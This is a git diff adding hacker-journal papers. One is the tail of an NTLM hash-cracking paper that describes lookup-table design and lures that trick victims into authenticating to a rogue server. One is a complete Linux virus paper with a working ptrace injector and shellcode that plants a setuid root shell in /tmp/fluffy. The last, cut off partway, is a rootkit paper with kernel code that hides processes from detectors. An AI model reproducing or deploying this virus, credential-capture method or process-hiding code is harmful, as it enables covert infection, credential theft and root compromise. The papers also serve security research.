36^7. +The only other input that needs accounting is the NULL padding bytes +used, bringing the total permutations to a bit more than 36^7. + +The approach taken here to allow for easy storage and recovery of hashes +and plain text is essentially to place every possible plaintext password +into one of 2048 buckets. It could easily be expanded to more. The table +creation tool simply generates every valid alphanumeric password, hashes +it and checks the first 11 bits of the hash. These bits determine which +of the 2048 buckets (implemented as files in this case) the plaintext +password belongs to. The plaintext password is then added to the bucket. +Now whenever a hash is captured, looking at the first 11 bits of the +hash determines the correct bucket to look into for the password. All +that's left to do now is hashing all the passwords in the bucket until a +match is found. This will take on average case ((36^7)/2048))/2, or +19131876 hash operations. This takes approximately three minutes on my +Pentium 4 2.8 Ghz machine. It takes the NTLM table generation tool 94 +hours to run on my machine. Fortunately, I only had to do that once :) + +The question is how to store more than 36^7 plaintext passwords, ranging +in size from 0(empty password) to 7 bytes. + +Approach 1: Store each password separated by newlines. As most passwords +are 7 byte in size and an additional newline extends that to 8 byte, the +outcome would be somewhere around (36^7)*8 bytes. That's roughly 584 +gigabytes, for the alphanumeric keyspace. There has to be a better way. + +Approach 2: By storing each password with 7 bytes, be it shorter than 7 +or not, the average space required for each password goes down from 8 to +7, as it's possible to get rid of the newlines. There's no need to +separate passwords by newlines if they're all the same size. (36^7)*7 is +still way too much though. + +Approach 3: The plaintext passwords are generated by 7 nested loops. The +first character changes all the time. The second character changes every +time the first has exhausted the entire keyspace. The third increments +each time the second has exhausted the keyspace and so on. What's +interesting is that the final 3 bytes rarely change. By storing them +only when they change, it's possible to store only the first 4 bytes of +each password, and once in a while a marker that signals a change in the +final 3 bytes, and is followed by the 3 byte that now form the end of +each plaintext password up to the next marker. That's roughly (36^7)*4 +bytes = 292 gigabytes. Much better. Still too much. + +Approach 4: For each character, there's 37 possible values. A-Z, 0-9 and +the 0 byte. 37 different values can be expressed by 6 bits. So we can +stuff 4 characters into 4*6 = 24 bits, which is 3 byte. How convenient! +(37^7)*3 == 265 gigabytes. Still too much. + +Approach 5: The passwords are being generated and stored in a +consecutive way. The hash determines which bucket to place each new +plaintext password into, but it's always 'bigger' than the previous one. +Using 2048 buckets, a test showed that, within any one file, no offset +between a password being stored and the next one stored into this bucket +exceeded 55000. By storing offsets to the previous password instead of +the full word, each password can be stored as a 2 byte value. + +For example, say the first password stored into one bucket is the one +char word "A". That's index 10 in the list of possible characters, as it +starts with 0-9. The table creation tool would now save 10 into the +bucket, as it's the first index from the start of the new bucket, and +it's 10 bigger than zero, the start value for each bucket. Now if by +chance the one character password "C" was to be stored into the same +bucket next, the number 2 would be stored, as "C" has an offset of 2 to +the previous password. If the next password for this bucket was "JH6", +the offset might be 31337. + +Basically each password is being stored in a base36 system, so the first +2 byte password, being "00", has an index of 37, and all the previous +password offsets and the offset for "00" itself of the bucket that "00" +is being stored in add up to 37. To retrieve a password saved in this +way requires a transformation of the decimal index back into the base36 +system, and using the resulting individual numbers as indexes into the +char keyspace[]. + +The resulting table size is (36^7 )*2 == 146 gigabytes. Still pretty +big, but small enough to easily fit on today's harddisks. As I mentioned +earlier the actual resulting size is a bit bigger in fact, as a bunch of +passwords that end with null bytes have to be stored too. In the end +it's not 146 gigabytes, but 151 instead. + +3.3) The big problem + + +Now there's a big problem concerning the creation of the NTLM lookup +tables. The first 8 byte of the final hash are derived from the first 7 +byte of the LM hash, which are derived from the first 7 byte of the +plaintext password. Creating tables to match the first 8 byte of the +NTLM hash to the first 7 bytes of the password is thus possible, but the +same tables do not work for the second or even third block of the 24 +byte NTLM hash. + +The second 8 byte chunk of the hash is derived from the last byte of the +first LM hash, and the first 6 byte of the second LM hash. This first +byte adds 256 possible values to the second LM hash. While the first 8 +byte chunk of the 24 byte LM hash stems purely from a LM hash of a +plaintext password, the second 8 byte chunk stems from an undetermined +byte and additional 6 byte of a LM hash. + +Being able to look up the first up to 7 bytes of the password is a big +advantage already though. The second part of the password, if it's +longer than 7 bytes at all, can now usually be easily guessed or brute +forced. Having determined that the password starts with "ILLUSTR" for +example, most often it may end with "ATION" or "ATOR". On the other +hand, when applying the brute force approach to this example after +looking up the first 7 bytes, it'd require to brute force 4-5 characters +until the final password is revealed. Even off-the-shelf hardware does +this in seconds. While taking a bit longer, even brute forcing 6 bytes +is nothing one couldn't sit out. 7 bytes, however, requires an +inconvenient amount of time. That's where being able to look that part +up as well would really come in handy. Well, guess what. There is a way. + +3.4) Breaking the second part of the password + + +As described earlier in this paper, the second part of the password, +just as the first one, is used to encrypt a known string to form an 8 +byte LM hash. Knowing the challenge sent from the server to the client, +it is possible to deduce the final 2 bytes of that LM hash out of the +third chunk of the NTLM hash. Doing so was explained in section 2.2. + +So the final 2 byte of the LM hash of the second half of the original +password are known. If a similar approach to breaking the first half of +the password is being applied now, looking up the second part of the +password as well becomes quite possible. + +The key here is to create a set of precomputed LanMan tables that are +sorted by the final 2 bytes of the LM hash. So once the final 2 byte of +the LM hash are known, a file is thus identified that contains plaintext +passwords that when hashed result in a matching 2 byte sequence at the +end. + +The second chunk of the NTLM hash is derived from 6 bytes that are the +start of the hash of one of the plaintext passwords out of the file that +just got identified, and a single byte, the first one, which is the +final byte of the first LM hash. + +Considering the first part of the password broken, that byte is known. +So all that's left to do is hash all the possible passwords in the file, +fit the single known byte into the first position of a string and +concatenate this one with 6 bytes from the just created hash, hashing +those 7 bytes again and comparing the result to the second chunk of the +NTLM hash. If it matches, the second part of the password has been +broken too. + +Even if looking up the first part of the password didn't prove +successful, the method may still be applied. The only change would be +that up to 256 possible values for the first byte would have to be +computed and tested as well. + +What's really interesting to note here, is that the second set of +tables, the sorted LM tables, unlike the first set of NTLM tables, does +NOT depend on a certain challenge. It will work with just any challenge, +which is usually sniffed or aquired from the wire when the password hash +and the username are being taken. + +4) How to get the victim to log into the rogue server? + +The big question to answer is how one can get the victim to log into the +rogue server, thus exposing his username and password hash for the +attacker to break. + +Approach 1: Sending a html mail that includes a link in the form of a +UNC path should do the trick, depending primarily on the sender's +rhetoric ability in getting his victim to click the link, and the mail +client to understand what it's expected to do. A UNC path is usually in +the form of 192.168.7.6share, where the IP address obviously specifies +the host to connect to, and ``share'' is a shared resource on that host. +Due to Microsoft always being concerned about comfort first, the +following will happen once the victim clicks the link on a Windows +machine. The OS will try to log into the specified resource. When asked +for a username and password, the client happily provides the current +user's username and his hashed password to the server in an effort to +try to log in with these credentials. No user interaction required. No +joke. + +Approach 2: Getting the victim to visit a site that includes a UNC path +with Internet Explorer has the same result. An image tag like will do +the trick. IE will make Windows try to log into the resource in order to +get the image. Again, no user interaction is required. This trick does +not work with Mozilla Firefox by the way. + +Approach 3: If the rogue server is part of the LAN, advertising it in +the network neighbourhood as "warez, porn, mp3, movie" - server should +result in users trying to log into it sooner or later. There's no way +anyone can withstand the power of the 4 elements! + +There's plenty of other ways that the author leaves to the readers +imagination. + +5) Things to remember + + +Once a hash has been received and successfully broken, it may still not +be the correct password, and accordingly not allow the attacker to log +into his victims machine. That's due to the password being hashed all +uppercase for LM, while the MD4 based second hash actually is case +sensitive. So a hash that's been deciphered as being "WELCOME" may +originally have been "Welcome" or "welcome" or even "wELCOME" or +"WeLcOme" or .. well, you get the idea. Then again, how many users +actually apply uncommon spelling schemes? + +6) Covering it up + + +Having read this paper the reader should by now realize that NTLM, +an authentication mechanism that probably most computers on this +planet support, is actually a big threat to hosts and entire +networks. Especially with the recently discovered remote Windows +exploits that require valid accounts on the victim machines for the +attacker to log into first, a worm that makes people visit a +website, which in turn makes them log into a rogue server that +breaks the hash and automatically exploits the victim is a +frightening threat scenario. + + +Bibliography + +Windows NT rantings from the L0pht +http://www.packetstormsecurity.org/Crackers/NT/l0phtcrack/l0phtcrack.rant.nt.passwd.txt + +Making a Faster Cryptanalytic Time-Memory Trade-Off +http://lasecwww.epfl.ch/ oechslin/publications/crypto03.pdf diff --git a/uninformed/3.5.txt b/uninformed/3.5.txt new file mode 100644 index 0000000..f42e44b --- /dev/null +++ b/uninformed/3.5.txt @@ -0,0 +1,561 @@ +Linux Improvised Userland Scheduler Virus +Izik +izik@tty64.org +Last modified: 12/29/2005 + +1) Introduction + +This paper discusses the combination of a userland scheduler and +runtime process infection for a virus. These two concepts complete +each other. The runtime process infection opens the door to invading +into other processes, and the userland scheduler provides a way to +make the injected code coexist with the original process code. This +allows the virus to remain stealthy and active inside an infected +process. + + +2) Scheduler, Who? + +A scheduler, in particular a process scheduler is a kernel component +that selects which process to run next. The scheduler is the basis +of a multitasking operating system such as Linux. By deciding what +process can run, the scheduler is responsible for utilizing the +system the best way and giving the impression that multiple +processes are simultaneously executing. A good example of using the +scheduler in a virus, is when the fork() syscall is used to +spawn a child process for the virus to run in. But fork() +puts the child process out, thus it appears in the system process +list and could attract attention. + + +3) Userland Scheduler + +An userland scheduler, as opposed to the kernel scheduler, runs +inside an application scope and deals with the application threads +and processes. The userland scheduler is still subject to the kernel +scheduler and meant to improve the application multi-threads +management. One of the major tasks that the scheduler performs is +context switching. Taking airtime from one thread to another. +Improvising a userland scheduler inside an infected process will +give the option of switching from the original process to the virus +and back, without attracting too much attention on the way. + + +4) Improvising a Userland Scheduler + +An application that does implement a userland scheduler in it, +provides the functions and support to do so in the code. This is a +privilege that a virus could not easily implement smoothly. So +improvising takes places. This raises two major problems: how and +when. How to perform the context switching task within a code that +has no previous support, and when the userland scheduler code can +run to begin supervising this in the first place. + +There are a few ways to do it. For example putting a hook on a +function is one way. Once the program will call the function that +has been hooked, the virus will activate and afterwards return control +to the program. But it's not an ideal solution as there is no +guarantee that the program will continue using it, and for how often +or long. In order to get a wider scope that could cover the entire +program, signals could be used. + +Looking at the signal mechanism in Linux, it's similar to the +interrupts mechanism, in the way that that the kernel allows a +program to process a signal within any place in the program code +without any special preparation and resume back to the program flow +once the signal handler function is done. It gives a very good way +to perform context switching with little effort. This answers the +"how" question, in how to perform the context switching task, using +the signal handler function as the base function of the virus which +will be invoked while the SIGALRM signal will be processed. + +Adopting the signal model to our needs is supported by the +alarm() syscall. The alarm() syscall allows the +process to schedule the alarm signal (SIGALRM) to be +delivered, thus making it kernel responsibility. Having the kernel +constantly delivering a signal to the process hosting the virus, +saves the virus the effort of doing it. This answers the when +question for when the userland scheduler code would run. Using the +alarm() syscall to schedule a SIGALRM to be +delivered to the process, that in turn will call the virus function. +This code demonstrates the functionality of alarm() and +SIGALRM: + +/* +* sigalrm-poc.c, SIGALRM Proof of Concept +*/ + +#include +#include +#include +#include + +// SIGALRM Handler + +void shapebreaker(int ignored) { + + // Break the cycle + + printf("\nX\n"); + + // Schedule another one + + alarm(5); + + return ; +} + +int main(int argc, char **argv) { + + int shape_selector = 0; + char shape; + + // Register for SIGALRM + + if (signal(SIGALRM, shapebreaker) < 0) { + perror("signal"); + return -1; + } + + // Schedule SIGALRM for 5 secs + + alarm(5); + + while(1) { + // Shape selector + + switch (shape_selector % 2) { + + case 0: + shape = '.'; + break; + + case 1: + shape = 'o'; + break; + + case 2: + shape = 'O'; + break; + } + + // Print given shape + + printf("%c\r", shape); + + // Incerase shape index + + shape_selector++; + + } + + // NEVER REACHED + + return 1; +} + +The program concept is pretty simple, it prints a char from a loop, +selecting the char via an index variable. Every five seconds or so, +a SIGALRM is being scheduled to be delivered using the +alarm() syscall. Once the signal has been processed the +signal handler, which is the shapebreaker() function in +this case, is being called and is breaking the char sequence. +Afterwards the program continues as if nothing happened. From within +the signal handler function, a virus can operate and once it +returns, the program will continue flawlessly. + + +5) Runtime Process Infection + +Runtime infection is done using the notorious ptrace() +syscall, which allows a process to attach to another process, +assuming of course, that it has root privileges or has a +father-child relationship with some exceptions to it. Once the +attached process gets into debugging mode, it is possible to modify +its registers and write/read from its address space. These are +features that are required to slip in the virus code and activate +it. For an in-depth review of the ptrace() injection +method, refer to the "Building ptrace Injecting Shellcodes" article +in Phrack 59[1]. + +5.1) The Algorithm + +Having the motives, tools and knowledge, here's the plan: + +Infector: +--------- + +* Attach to process +> Wait for process to stop + > Query process registers + > Calculate previous stack page beginning + > Store current EIP + > Inject pre-virus and virus code + > Set EIP to pre-virus code + > Deattach from process + +Pre-Virus: +---------- + + * Register SIGALRM signal +> Schedule SIGALRM (14secs) +> Give control back to process + +Virus: +------ + +* SIGALRM handler invoked +> Check for /tmp/fluffy + > Create fluffy.c + > Compile fluffy.c + > Remove /tmp/fluffy.c + > Chmod /tmp/fluffy +> Jmp to pre-virus code + +The infecting process is divided into two steps, the infector +injects the virus and the pre-virus code to the infected process. +Afterward it sets the process EIP to point to the pre-virus +code. This independently registers to the SIGALRM signal +within the infected process and calculates the virus location for +the signal callback function. Then it schedules a SIGALRM +signal and passes the control back to the process. Once the signal +caught the virus it kicks in as the signal handler. + + +5.2) Meet Fluffy + +A code that implements the above theory: + +/* +* x86-fluffy-virus.c, Fluffy virus / izik@tty64.org +*/ + +#include +#include +#include +#include +#include +#include +#include + +char virus_shcode[] = + +// <_start>: + + "\x90" // nop + "\x90" // nop + "\x60" // pusha + "\x9c" // pushf + "\x31\xc0" // xor %eax,%eax + "\x31\xdb" // xor %ebx,%ebx + "\xb0\x30" // mov $0x30,%al + "\xb3\x0e" // mov $0xe,%bl + "\xeb\x06" // jmp <_geteip> + +// <_calc_eip>: + + "\x59" // pop %ecx + "\x83\xc1\x0d" // add $0xd,%ecx + "\xeb\x05" // jmp <_continue> + +// <_geteip>: + + "\xe8\xf5\xff\xff\xff" // call <_calc_eip> + +// <_continue>: + + "\xcd\x80" // int $0x80 + "\x85\xc0" // test %eax,%eax + "\x75\x04" // jne <_resumeflow> + "\xb0\x1b" // mov $0x1b,%al + "\xcd\x80" // int $0x80 + +// <_resumeflow>: + + "\x9d" // popf + "\x61" // popa + "\xc3" // ret + +// <_virus>: + + "\x55" // push %ebp + "\x89\xe5" // mov %esp,%ebp + "\x31\xc0" // xor %eax,%eax + "\x31\xc9" // xor %ecx,%ecx + "\xeb\x57" // jmp <_data_jmp> + +// <_chkforfluffy>: + + "\x5e" // pop %esi + +// <_fixnulls>: + + "\x3a\x46\x07" // cmp 0x7(%esi),%al + "\x74\x0b" // je <_access> + "\xfe\x46\x07" // incb 0x7(%esi) + "\xfe\x46\x0a" // incb 0xa(%esi) + "\xb0\xb3" // mov $0xb3,%al + "\xfe\x04\x06" // incb (%esi,%eax,1) + +// <_access>: + + "\xb0\xa8" // mov $0xa8,%al + "\x8d\x1c\x06" // lea (%esi,%eax,1),%ebx + "\xb0\x21" // mov $0x21,%al + "\xb1\x04" // mov $0x4,%cl + "\xcd\x80" // int $0x80 + "\x85\xc0" // test %eax,%eax + "\x74\x31" // je <_schedule> + +// <_fork>: + + "\x01\xc8" // add %ecx,%eax + "\xcd\x80" // int $0x80 + "\x85\xc0" // test %eax,%eax + "\x75\x1f" // jne <_waitpid> + +// <_exec>: + + "\x31\xd2" // xor %edx,%edx + "\xb0\x17" // mov $0x17,%al + "\x31\xdb" // xor %ebx,%ebx + "\xcd\x80" // int $0x80 + "\xb0\x0b" // mov $0xb,%al + "\x89\xf3" // mov %esi,%ebx + "\x52" // push %edx + "\x8d\x7e\x0b" // lea 0xb(%esi),%edi + "\x57" // push %edi + "\x8d\x7e\x08" // lea 0x8(%esi),%edi + "\x57" // push %edi + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x31\xc0" // xor %eax,%eax + "\x40" // inc %eax + "\xcd\x80" // int $0x80 + +// <_waitpid>: + + "\x89\xc3" // mov %eax,%ebx + "\x31\xc0" // xor %eax,%eax + "\x31\xc9" // xor %ecx,%ecx + "\xb0\x07" // mov $0x7,%al + "\xcd\x80" // int $0x80 + +// <_schedule>: + + "\xc9" // leave + "\xe9\x7c\xff\xff\xff" // jmp <_start> + +// <_data_jmp>: + + "\xe8\xa4\xff\xff\xff" // call <_chkforfluffy> + +// +// /bin/sh\xff-c\xff +// echo "int main() { setreuid(0, 0); system(\"/bin/bash\"); return 1; }" > /tmp/fluffy.c ; +// cc -o /tmp/fluffy /tmp/fluffy.c ; +// rm -rf /tmp/fluffy.c ; +// chmod 4755 /tmp/fluffy\xff +// + +// <_data_sct>: + + "\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x65\x63\x68\x6f\x20" + "\x22\x69\x6e\x74\x20\x6d\x61\x69\x6e\x28\x29\x20\x7b\x20\x73\x65" + "\x74\x72\x65\x75\x69\x64\x28\x30\x2c\x20\x30\x29\x3b\x20\x73\x79" + "\x73\x74\x65\x6d\x28\x5c\x22\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68" + "\x5c\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x31\x3b\x20\x7d" + "\x22\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e" + "\x63\x20\x3b\x20\x63\x63\x20\x2d\x6f\x20\x2f\x74\x6d\x70\x2f\x66" + "\x6c\x75\x66\x66\x79\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66" + "\x79\x2e\x63\x20\x3b\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x74\x6d" + "\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e\x63\x20\x3b\x20\x63\x68\x6d" + "\x6f\x64\x20\x34\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75" + "\x66\x66\x79\xff"; + +int ptrace_inject(pid_t, long, void *, int); + +int main(int argc, char **argv) { + + pid_t pid; + struct user_regs_struct regs; + long infproc_addr; + + if (argc < 2) { + printf("usage: %s \n", argv[0]); + return -1; + } + + pid = atoi(argv[1]); + + // Attach to the process + + if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) < 0) { + perror(argv[1]); + return -1; + } + + // Wait for a process to stop + + if (waitpid(pid, NULL, 0) < 0) { + perror(argv[1]); + ptrace(PTRACE_DETACH, pid, NULL, NULL); + return -1; + } + + // Query process registers + + if (ptrace(PTRACE_GETREGS, pid, ®s, ®s) < 0) { + perror("Oopsie"); + ptrace(PTRACE_DETACH, pid, NULL, NULL); + return -1; + } + + printf("Original ESP: 0x%.8lx\n", regs.esp); + printf("Original EIP: 0x%.8lx\n", regs.eip); + + // Push original EIP on stack for virus to RET + + regs.esp -= 4; + + ptrace(PTRACE_POKETEXT, pid, regs.esp, regs.eip); + + // Calculate the previous stack page top address + + infproc_addr = (regs.esp & 0xFFFFF000) - 0x1000; + + printf("Injection Base: 0x%.8lx\n", infproc_addr); + + // Inject virus code + + if (ptrace_inject(pid, infproc_addr, virus_shcode, sizeof(virus_shcode) - 1) < 0) { + return -1; + } + + // Change EIP to point over virus shcode + + regs.eip = infproc_addr + 2; + + printf("Current EIP: 0x%.8lx\n", regs.eip); + + // Set process registers (EIP changed) + + if (ptrace(PTRACE_SETREGS, pid, ®s, ®s) < 0) { + perror("Oopsie"); + ptrace(PTRACE_DETACH, pid, NULL, NULL); + return -1; + } + + // It's fluffy time! + + if (ptrace(PTRACE_DETACH, pid, NULL, NULL) < 0) { + perror("Oopsie"); + return -1; + } + + printf("pid #%d got infected!\n", pid); + + return 1; +} + +// Injection Function + +int ptrace_inject(pid_t pid, long memaddr, void *buf, int buflen) { + + long data; + + while (buflen > 0) { + memcpy(&data, buf, 4); + + if ( ptrace(PTRACE_POKETEXT, pid, memaddr, data) < 0 ) { + perror("Oopsie!"); + ptrace(PTRACE_DETACH, pid, NULL, NULL); + + return -1; + } + + memaddr += 4; + buf += 4; + buflen -= 4; + } + + return 1; +} + +A few pointers about the code: + +The virus assembly parts were written as one chunk, the pre-virus +code is located in the top and the virus code in the bottom. It is +also written in shellcode programming style, which produces a NULL +free and somewhat optimized code. As this chunk has been injected +into the infected process, it keeps the virus as small as possible, +which always is a good idea. + +The virus code assumes it will run more than once inside a given +infected process. This means that self modifying code actions such +as fixing NULLs in runtime, first checks if it is needed in the +current virus iteration. + +The virus itself is programmed to drop a suid shell called +/tmp/fluffy. Before doing so, it will check if the file +exists, and if that is not the case, it will execve() a +small hardcoded shell script to generate a suid wrapper. Iteration +occurs every 14 secs. + +The signal() syscall has a habit of restarting the signal handler to +default after it has been called. This means the virus has to +re-register to the signal every time. An alternative solution is to +setup the signal handler using other signal related syscalls such as +sigaction() or rtsigaction() which is how the libc signal() function +is implemented. Choosing signal() over these syscalls was based on +size related issues. + + +5.3) Further Design Issues + +Aside of what concerns the code itself: + +Injecting to the previous stack page top address is a safety move to +assure the virus code won't overwrite any program related data on +the stack. Testing the virus on the syslogd daemon showed that this +make sense, as the syslogd at some point managed to partly overwrite +the virus code. A common pitfall is NULLs, as two NULLs overwrite +(e.g. \x00\x00) creates a valid assembly instruction ADD AL,(EAX) +which easily leads to a crash. + +Apart from the stack it is possible to inject the code to the .text +section itself. As on x86IA32, pages are 4k aligned and the program +code itself might not fill up the entire page. The gap created often +is referred to as "cave", and it is an ideal place to park the virus +assuming of course the virus is small enough to get into it. But due +to nature of the .text section, which is not writable, the +virus will require to issue mprotect() on the current page +to perform self modifying actions on itself. + +An easy way to find a suitable process to infect using an automatic +approach, would be to start an attachment loop starting from the pid +zero and onward. As the system boots and enters init 3 (e.g. +multiuser) a series of daemons are being launched. Due to the timing +of these daemons, their pids would be closer to zero, an example for +such would be crond, syslogd and inetd. + + +6) Conclusion + +Implementation of a userland scheduler code allows to run an external +code in a perfect harmony with the existing code. Taking an exploit +scenario from any kind and adding this feature to it, can turn a normal +straight forward shellcode to a backdoor and more. + + +References: + +[1] Building ptrace Injecting Shellcodes +anonymous +http://www.phrack.org/show.php?p=59&a=12; +accessed December 29, 2005. + + + diff --git a/uninformed/3.6.txt b/uninformed/3.6.txt new file mode 100644 index 0000000..e596364 --- /dev/null +++ b/uninformed/3.6.txt @@ -0,0 +1,379 @@ +FUTo +Peter Silberman & C.H.A.O.S. + + +1) Foreword + +Abstract: + +Since the introduction of FU, the rootkit world has moved away from +implementing system hooks to hide their presence. Because of this change +in offense, a new defense had to be developed. The new algorithms used +by rootkit detectors, such as BlackLight, attempt to find what the +rootkit is hiding instead of simply detecting the presence of the +rootkit's hooks. This paper will discuss an algorithm that is used by +both Blacklight and IceSword to detect hidden processes. This paper will +also document current weaknesses in the rootkit detection field and +introduce a more complete stealth technique implemented as a prototype +in FUTo. + +Thanks: + +Peter would like to thank bugcheck, skape, thief, pedram, F-Secure for +doing great research, and all the nologin/research'ers who encourage +mind growth. + +C.H.A.O.S. would like to thank Amy, Santa (this work was three hours on +Christmas day), lonerancher, Pedram, valerino, and HBG Unit. + + +2) Introduction + +In the past year or two, there have been several major developments in +the rootkit world. Recent milestones include the introduction of the FU +rootkit, which uses Direct Kernel Object Manipulation (DKOM); the +introduction of VICE, one of the first rootkit detection programs; the +birth of Sysinternals' Rootkit Revealer and F-Secure's Blacklight, the +first mainstream Windows rootkit detection tools; and most recently the +introduction of Shadow Walker, a rootkit that hooks the memory manager +to hide in plain sight. + +Enter Blacklight and IceSword. The authors chose to investigate the +algorithms used by both Blacklight and IceSword because they are +considered by many in the field to be the best detection tools. +Blacklight, developed by the Finnish security company F-Secure, is +primarily concerned with detecting hidden processes. It does not attempt +to detect system hooks; it is only concerned with hidden processes. +IceSword uses a very similar method to Blacklight. IceSword +differentiates itself from Blacklight in that it is a more robust tool +allowing the user to see what system calls are hooked, what drivers are +hidden, and what TCP/UDP ports are open that programs, such as netstat, +do not. + + +3) Blacklight + +This paper will focus primarily on Blacklight due to its algorithm being +the research focus for this paper. Also, it became apparent after +researching Blacklight that IceSword used a very similiar algorithm. +Therefore, if a weakness was found in Blacklight, it would most likely +exist in IceSword as well. + +Blacklight takes a userland approach to detecting processes. Although +simplistic, its algorithm is amazingly effective. Blacklight uses some +very strong anti-debugging features that begin by creating a Thread +Local Storage (TLS) callback table. Blacklight's TLS callback attempts +to befuddle debuggers by forking the main process before the process +object is fully created. This can occur because the TLS callback routine +is called before the process is completely initialized. Blacklight also +has anti-debugging measures that detect the presence of debuggers +attaching to it. Rather than attempting to beat the anti-debugging +measures by circumventing the TLS callback and making other program +modifications, the authors decided to just disable the TLS routine. To +do this, the authors used a tool called LordPE. LordPE allows users to +edit PE files. The authors used this tool to zero out the TLS callback +table. This disabled the forking routine and gave the authors the +ability to use an API Monitor. It should be noted that disabling the +callback routine would allow you to attach a debugger, but when the user +clicked "scan" in the Blacklight GUI Blacklight would detect the +debugger and exit. Instead of working up a second measure to circumvent +the anti-debugging routines, the authors decided to analyze the calls +occuring within Blacklight. To this end, the authors used Rohitabs API +Monitor. + +In testing, one can see failed calls to the API OpenProcess (tls zero is +Blacklight without a TLS table). Blacklight tries opening a process with +process id (PID) of 0x1CC, 0x1D0, 0x1D4, 0x1D8 and so on. The authors +dubbed the method Blacklight uses as PID Bruteforce (PIDB). Blacklight +loops through all possible PIDS calling OpenProcess on the PIDs in the +range of 0x0 to 0x4E1C. Blacklight keeps a list of all processes it is +able to open, using the PIDB method. Blacklight then calls +CreateToolhelp32Snapshot, which gives Blacklight a second list of +processes. Blacklight then compares the two lists, to see if there are +any processes in the PIDB list that are not in the list returned by the +CreateToolhelp32Snapshot function. If there is any discrepancy, these +processes are considered hidden and reported to the user. + + +3.1) Windows OpenProcess + +In Windows, the OpenProcess function is a wrapper to the NtOpenProcess +routine. NtOpenProcess is implemented in the kernel by NTOSKRNL.EXE. The +function prototype for NtOpenProcess is: + +NTSTATUS NtOpenProcess ( + OUT PHANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN PCLIENT_ID ClientId OPTIONAL); + +The ClientId parameter is the actual PID that is passed by OpenProcess. +This parameter is optional, but during our observation the OpenProcess +function always specified a ClientId when calling NtOpenProcess. + +NtOpenProcess performs three primary functions: + + 1. It verifies the process exists by calling PsLookupProcessByProcessId. + 2. It attempts to open a handle to the process by calling + ObOpenObjectByPointer. + 3. If it was successful opening a handle to the process, it passes the + handle back to the caller. + +PsLookupProcessByProcessId was the next obvious place for research. One +of the outstanding questions was how does PsLookupProcessByProcessId +know that a given PID is part of a valid process? The answer becomes +clear in the first few lines of the disassembly: + +PsLookupProcessByProcessId: + mov edi, edi + push ebp + mov ebp, esp + push ebx + push esi + mov eax, large fs:124h + push [ebp+arg_4] + mov esi, eax + dec dword ptr [esi+0D4h] + push PspCidTable + call ExMapHandleToPointer + +From the above disassembly, it is clear that ExMapHandleToPointer +queries the PspCidTable for the process ID. + +Now we have a complete picture of how Blacklight detects hidden processes: + + 1. Blacklight starts looping through the range of valid process IDs, 0 + through 0x41DC. + 2. Blacklight calls OpenProcess on every possible PID. + 3. OpenProcess calls NtOpenProcess. + 4. NtOpenProcess calls PsLookupProcessByProcessId to verify the + process exists. + 5. PsLookupProcessByProcessId uses the PspCidTable to verify the + processes exists. + 6. NtOpenProcess calls ObOpenObjectByPointer to get the handle to the + process. + 7. If OpenProcess was successful, Blacklight stores the information + about the process and continues to loop. + 8. Once the process list has been created by exhausting all possible + PIDs. Blacklight compares the PIDB list with the list it creates by + calling CreateToolhelp32Snapshot. CreateToolhelp32Snapshot is a Win32 + API that takes a snapshot of all running processes on the system. A + discrepancy between the two lists implies that there is a hidden + process. This case is reported by Blacklight. + + +3.2) The PspCidTable + +The PspCidTable is a "handle table for process and thread client IDs". +Every process' PID corresponds to its location in the PspCidTable. The +PspCidTable is a pointer to a HANDLE_TABLE structure. + +typedef struct _HANDLE_TABLE { + PVOID p_hTable; + PEPROCESS QuotaProcess; + PVOID UniqueProcessId; + EX_PUSH_LOCK HandleTableLock [4]; + LIST_ENTRY HandleTableList; + EX_PUSH_LOCK HandleContentionEvent; + PHANDLE_TRACE_DEBUG_INFO DebugInfo; + DWORD ExtraInfoPages; + DWORD FirstFree; + DWORD LastFree; + DWORD NextHandleNeedingPool; + DWORD HandleCount; + DWORD Flags; +}; + +Windows offers a variety of non-exported functions to manipulate and retrieve +information from the PspCidTable. These include: + + - [ExCreateHandleTable] creates non-process handle tables. The + objects within all handle tables except the PspCidTable are pointers + to object headers and not the address of the objects themselves. + - [ExDupHandleTable] is called when spawning a process. + - [ExSweepHandleTable] is used for process rundown. + - [ExDestroyHandleTable] is called when a process is exiting. + - [ExCreateHandle] creates new handle table entries. + - [ExChangeHandle] is used to change the access mask on a handle. + - [ExDestroyHandle] implements the functionality of CloseHandle. + - [ExMapHandleToPointer] returns the address of the object corresponding to the handle. + - [ExReferenceHandleDebugIn] tracing handles. + - [ExSnapShotHandleTables] is used for handle searchers (for example in oh.exe). + +Below is code that uses non-exported functions to remove a process +object from the PspCidTable. It uses hardcoded addresses for the +non-exported functions necessary; however, a rootkit could find these +function addresses dynamically. + +typedef PHANDLE_TABLE_ENTRY (*ExMapHandleToPointerFUNC) + ( IN PHANDLE_TABLE HandleTable, + IN HANDLE ProcessId); + +void HideFromBlacklight(DWORD eproc) +{ + PHANDLE_TABLE_ENTRY CidEntry; + ExMapHandleToPointerFUNC map; + ExUnlockHandleTableEntryFUNC umap; + PEPROCESS p; + CLIENT_ID ClientId; + + map = (ExMapHandleToPointerFUNC)0x80493285; + + CidEntry = map((PHANDLE_TABLE)0x8188d7c8, + LongToHandle( *((DWORD*)(eproc+PIDOFFSET)) ) ); + if(CidEntry != NULL) + { + CidEntry->Object = 0; + } + return; +} + +Since the job of the PspCidTable is to keep track of all the processes +and threads, it is logical that a rootkit detector could use the +PspCidTable to find hidden processes. However, relying on a single data +structure is not a very robust algorithm. If a rootkit alters this one +data structure, the operating system and other programs will have no +idea that the hidden process exists. New rootkit detection algorithms +should be devised that have overlapping dependencies so that a single +change will not go undetected. + + +4) FUTo + +To demonstrate the weaknesses in the algorithms currently used by +rootkit detection software such as Blacklight and Icesword, the authors +have created FUTo. FUTo is a new version of the FU rootkit. FUTo has +the added ability to manipulate the PspCidTable without using any +function calls. It uses DKOM techniques to hide particular 